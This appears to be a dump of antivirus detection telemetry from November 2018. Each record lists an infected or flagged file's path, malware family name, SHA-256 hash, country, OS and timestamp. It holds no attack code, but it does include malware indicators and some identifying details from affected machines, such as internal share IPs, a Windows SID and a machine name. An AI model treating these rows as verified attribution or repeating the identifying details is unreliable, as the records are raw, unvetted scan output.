  Row(detection=Row(filename='slides vecchie.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\SLIDES VECCHIE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c4fee27785e42c098deb24e573856f51641b42ab3055b0de96a8d8c89f031bfd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered cotil', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cotil', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='218d43a988ba8d2f2f4e8d647390d610a1ef92363ead13e72196fc3624d5fa9e', metadata=Row(cmdline='{D64BEDCF-079B-443D-8695-B56E717D704D} S-1-5-21-3054365924-2510568485-3506375679-1000:ACER-PC\\\\\\\\ACER:Interactive:LUA[1]', country='NO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-04T02:50:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rename_me.exe', filepath='C:\\Users\\X\\Desktop\\rr\\rename_me.exe', filesize=13888000, name='HEUR/AGEN.1034874.#M1.#R1'), hash='30ebdb6456b07c0c037c3654b65346acc8d38e82ecb6c637507f07df1fbcafad', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:43:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132647-5da92df1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132647-5DA92DF1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:26:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145626-2634e01b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3d880bdd\\AVSCAN-20181104-145417-120628BD\\AVSCAN-20181104-145626-2634E01B', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:56:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152753-7622434c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152753-7622434C', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:27:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204253-6a05ebba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b406002\\AVSCAN-20181104-203447-1ABE6DE4\\AVSCAN-20181104-204253-6A05EBBA', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:43:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='castsrv.exe', filepath='C:\\Windows\\System32\\CastSrv.exe', filesize=60000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='77a7de2f5473a3d62582bcc5bae9c97a861511f671f6c7b84f365b56f36f29c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-194449-0532ae4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b61cce0\\AVSCAN-20181105-194252-F5BAF14C\\AVSCAN-20181105-194449-0532AE4B', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T11:24:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wncserve.exe', filepath='\\\\?\\C:\\WorkNC-LicenseServer\\exe\\msw\\wncserve.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='45b04542f0eade0ffd244589510db60267f875f7e1f4b675591d7a124d4b7be9', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:23:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130840-0b8bd8ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130840-0B8BD8EC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240f2', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240f2', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122847-f90f2e72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-122847-F90F2E72', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:11:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b400ab4954a630bf08e189cc270818048dc7438d', filepath='C:\\Users\\X\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\ywslakqj.default\\cache2\\entries\\B400AB4954A630BF08E189CC270818048DC7438D', filesize=8000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='4898e914c177df97944d81a15f1e22295368d76391370aa1679414defd21de07', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-04T21:26:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\ProgramData\\Intel\\Package Cache\\{176E2755-0A17-42C6-88E2-192AB2131278}\\Setup.exe', filesize=1088000, name='W32/Jeefo.A.#M1.#R1'), hash='4280079a76e081b440163e41cd406889854fa1a53dee4ca4c3a2313f8e553bfb', metadata=Row(cmdline='--engine=2 --session-id=fvPA5EKCy0uDq2bE0hK6yzlOZyCxkskc+j3DG\\\\\\/zI --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='MQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-04T16:42:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe472_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe472 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T22:51:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Nueva carpeta (3)\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:XuRsm8fZqEyo5764.1', country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T14:53:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='deletejobprinter.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DeleteJobPrinter.exe', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kur.exe', filepath='c:\\progressive\\kur.exe', filesize=384000, name='SPR/Silentall.0b64d8.#M1.#R1'), hash='0b64d8fcd39bde373e889997c1b79a11dcfe07c12e9980cb8ec522bbb2248cc1', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:07:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='66b74b9bb62f2f50b30b00e6143a733f.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1839214134\\66b74b9bb62f2f50b30b00e6143a733f.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='76051cc9e24ebc90fd654dc64d494023124b3d9ab2c0a5e90d7f6d51db2320e8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T18:50:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075250-774586cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-075229-737E5C82\\AVSCAN-20181104-075250-774586CF', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:54:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-052119-4c54cdef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a26dbab4\\AVSCAN-20181104-051702-16358572\\AVSCAN-20181104-052119-4C54CDEF', filesize=832000, name='TR/Snarasite.807b68.#M1.#R1'), hash='807b6827c5a58b9bf1505ddd4556e81aa286e90a324b8d263f95e5a31e9fe122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:21:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001250-47fc1421', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b450994d\\AVSCAN-20181105-001203-4201F4A6\\AVSCAN-20181105-001250-47FC1421', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:12:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102525-1fc81097', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0142c7cb\\AVSCAN-20181104-102332-13D207E5\\AVSCAN-20181104-102525-1FC81097', filesize=256000, name='TR/Agent.292352.100.#M1.#R1'), hash='d67241917a5151c675747260f544ec20ee79d35f8176f0887ac35937ae6ab2e9', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:25:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mighost.exe', filepath='E:\\win7\\support\\migwiz\\mighost.exe', filesize=320000, name='W32/Sality.#M1.#R1'), hash='45631a1eab35d2d8501e3220d55611e3d572bd516e785eef73aea6735871d9fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sures.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\L210_WW_WIN_3793_42\\LIB\\0415\\sures.dll', filesize=324000, name='W32/Ramnit.C.#M1.#R1'), hash='684363cde47c2aae3559e899f0184f3b6bbe1fca44a16dbb5e96decd0226a614', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673040, timestamp='2018-11-04T00:04:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install_ccleaner.exe', filepath='C:\\Users\\X\\Downloads\\install_ccleaner.exe', filesize=772000, name='PUA/InstallCore.Gen.#M300.#R5961'), hash='7546b6c3b05ad15c204bd8db2a88158d2f45579438e52932857fe453ec6f7222', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T15:26:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='4876bc6e6ed665ecb4a06015d237d76f1820e09e', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4876bc6e6ed665ecb4a06015d237d76f1820e09e', filesize=320000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='96e1861d522973d882a30eea370ca54291a12425345c2818c92b1f8e7306e405', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:57:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ohljdgkm.exe', filepath='E:\\Files\\_\\\xa0\\RECYCLER\\S-7-2-78-8025257506-8562600567-810682140-8285\\OHljdGKm.exe', filesize=64000, name='TR/Rogue.64000.#M1.#R1'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T00:32:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T10:52:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='140___08.exe', filepath='d:\\كاميرا\\140___08\\140___08.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:58:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124646-83d1efd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-124646-83D1EFD6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_16d8986c.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_16d8986c.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114319-59fd03ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_02575c9b\\AVSCAN-20181104-114135-46254343\\AVSCAN-20181104-114319-59FD03AC', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='0c958b5f847c20f5dfe26f112d47e0f8f4e69558a64b2ebfd97e9da8e629756d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:43:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055517-4592f7ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055517-4592F7EF', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sidibe.exe', filepath='G:\\SIDIBE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:14:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220004-e094556d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-220004-E094556D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140032-1bbb87e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c0be29e5\\AVSCAN-20181104-135959-177C3032\\AVSCAN-20181104-140032-1BBB87E3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:YFNxkgtW8keHDuRG.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:44:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23403_none_75f4c7b492ce2cb7\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='9889486a0a57ff8c858a9629729b4feacf47aa9f28ff1440d3f9cebfd5292acb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:03:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T02:39:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ccp.exe', filepath='\\\\?\\D:\\Users\\X\\AppData\\Local\\Temp\\6D0F977C-BAB0-7891-B453-7AA6EF2D7AB1\\Latest\\ccp.exe', filesize=244000, name='TR/BProtector.nes.4.#M1.#R1'), hash='bb1e635aa88a6906473713bd49368553f49c21e885c1586742542b3fee4b405c', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:29:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151124-2bce84a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5abbdeb8\\AVSCAN-20181104-151032-24159DF7\\AVSCAN-20181104-151124-2BCE84A5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:11:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193141-f8d95ae4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6239d67c\\AVSCAN-20181104-193110-F415DC16\\AVSCAN-20181104-193141-F8D95AE4', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:31:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000ff719', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp000ff719', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\AppData\\Local\\Smartbar\\Application\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='f09c3035753bb10feeff287e6f3adab632dd2ba07eba4f70cf4430a42bca9ff0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T05:04:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='upfkjcbwbb.exe', filepath='c:\\users\\X\\appdata\\roaming\\upfkjcbwbb.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T15:00:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:06:02Z'), dt=datetime.date(2018, 11, 2)),
